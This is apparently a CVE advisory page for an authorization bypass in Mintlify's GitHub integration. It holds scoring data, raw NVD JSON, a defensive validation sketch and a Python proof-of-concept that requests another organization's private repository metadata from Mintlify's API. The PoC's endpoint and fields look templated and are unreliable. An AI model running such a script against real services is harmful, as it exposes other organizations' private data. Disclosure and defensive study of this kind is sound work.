Security Vulnerability Report
CVE-2025-67844 CVSS 5.0 MEDIUM

CVE-2025-67844

Published: 2025-12-19 02:16:09
Last Modified: 2026-01-02 16:10:46

Description

The GitHub Integration API in Mintlify Platform before 2025-11-15 allows remote attackers to obtain sensitive repository metadata via the repository owner and name fields. It fails to validate that the repository owner and name fields provided during configuration belong to the specific GitHub App Installation ID associated with the user's organization.
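The check the description says was missing, sketched server-side as an added example (not Mintlify's code): the installation ID comes from the organization's stored record, and the requested owner/name must appear in that installation's repository list. The `org` record shape, function names and sample data are assumptions; the lister stands in for GitHub's `GET /installation/repositories`.

```python
import re

# GitHub naming rules: owner is alphanumerics with single inner hyphens
# (max 39 chars); repository is alphanumerics, '.', '_' and '-' (max 100).
OWNER_RE = re.compile(r"[A-Za-z0-9](?:[A-Za-z0-9]|-(?=[A-Za-z0-9])){0,38}")
REPO_RE = re.compile(r"[A-Za-z0-9._-]{1,100}")


class RepoNotAuthorized(Exception):
    """Raised for every rejection so the API returns one uniform error."""


def authorize_repo_config(org, owner, name, list_installation_repos):
    """Return the canonical full_name if the org's installation covers owner/name.

    org: server-side organization record (hypothetical shape) holding the
         installation_id saved when the GitHub App was installed.
    list_installation_repos: callable(installation_id) -> iterable of dicts
         with a "full_name" key, as in GET /installation/repositories.
    """
    deny = RepoNotAuthorized("repository not available")
    if not (isinstance(owner, str) and isinstance(name, str)):
        raise deny
    if not (OWNER_RE.fullmatch(owner) and REPO_RE.fullmatch(name)):
        raise deny
    if name in (".", ".."):
        raise deny

    installation_id = org.get("installation_id")  # never read from the request
    if installation_id is None:
        raise deny

    wanted = f"{owner}/{name}".lower()  # GitHub names are case-insensitive
    for repo in list_installation_repos(installation_id):
        if repo["full_name"].lower() == wanted:
            return repo["full_name"]
    raise deny  # same error whether the repo exists elsewhere or not


# Constructed sample data standing in for GitHub's per-installation repo list.
SAMPLE_INSTALLATIONS = {
    1001: [{"full_name": "acme-docs/handbook"}],
    2002: [{"full_name": "other-org/internal-wiki"}],
}


def sample_lister(installation_id):
    return SAMPLE_INSTALLATIONS.get(installation_id, [])
```

Every rejection raises the same error, so a caller cannot use the response to tell whether a repository outside its installation exists.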

CVSS Details

CVSS Score: 5.0
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:mintlify:mintlify:*:*:*:*:*:*:*:* - VULNERABLE
Mintlify Platform < 2025-11-15

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-67844 PoC - Mintlify GitHub Integration API Authorization Bypass
# This PoC demonstrates how an attacker with low-privilege access can obtain
# sensitive repository metadata from any GitHub repository through Mintlify's API

import requests
import json

TARGET_HOST = "https://api.mintlify.com"  # Replace with actual Mintlify instance
ATTACKER_TOKEN = "attacker_low_privilege_token"  # Valid low-privilege user token


def exploit_mintlify_github_integration():
    """
    Exploit unauthorized repository metadata access via GitHub Integration API
    """
    headers = {
        "Authorization": f"Bearer {ATTACKER_TOKEN}",
        "Content-Type": "application/json"
    }

    # Target repository that does NOT belong to attacker's organization
    target_owner = "target-organization"
    target_repo = "private-sensitive-repo"

    # Step 1: Configure GitHub integration with arbitrary repository
    payload = {
        "github_config": {
            "repository_owner": target_owner,
            "repository_name": target_repo,
            "branch": "main"
        }
    }

    # Step 2: Trigger metadata retrieval (bypassing installation ID validation)
    response = requests.post(
        f"{TARGET_HOST}/integrations/github/configure",
        headers=headers,
        json=payload
    )

    # Step 3: Extract sensitive repository metadata
    if response.status_code == 200:
        metadata = response.json()
        print("[+] Successfully obtained repository metadata:")
        print(f"  - Repository: {metadata.get('full_name')}")
        print(f"  - Description: {metadata.get('description')}")
        print(f"  - Visibility: {metadata.get('private')}")
        print(f"  - Default branch: {metadata.get('default_branch')}")
        print(f"  - Languages: {metadata.get('language')}")
        print(f"  - File tree: {metadata.get('file_tree')}")
        return metadata
    else:
        print(f"[-] Failed: {response.status_code}")
        return None


if __name__ == "__main__":
    exploit_mintlify_github_integration()
```

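References

https://kibty.town/blog/mintlify/ (Exploit, Third Party Advisory)
https://news.ycombinator.com/item?id=46317098 (Issue Tracking)
https://www.mintlify.com/blog/working-with-security-researchers-november-2025 (Vendor Advisory)
https://www.mintlify.com/docs/changelog (Release Notes)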

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67844", "sourceIdentifier": "[email protected]", "published": "2025-12-19T02:16:09.147", "lastModified": "2026-01-02T16:10:46.363", "vulnStatus": "Analyzed", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["exclusively-hosted-service"]}], "descriptions": [{"lang": "en", "value": "The GitHub Integration API in Mintlify Platform before 2025-11-15 allows remote attackers to obtain sensitive repository metadata via the repository owner and name fields. It fails to validate that the repository owner and name fields provided during configuration belong to the specific GitHub App Installation ID associated with the user's organization."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N", "baseScore": 5.0, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-425"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mintlify:mintlify:*:*:*:*:*:*:*:*", "versionEndExcluding": "2025-11-15", "matchCriteriaId": 
"4E599124-4B00-4D5C-ADB5-EC4564D3E5BF"}]}]}], "references": [{"url": "https://kibty.town/blog/mintlify/", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://news.ycombinator.com/item?id=46317098", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://www.mintlify.com/blog/working-with-security-researchers-november-2025", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mintlify.com/docs/changelog", "source": "[email protected]", "tags": ["Release Notes"]}]}}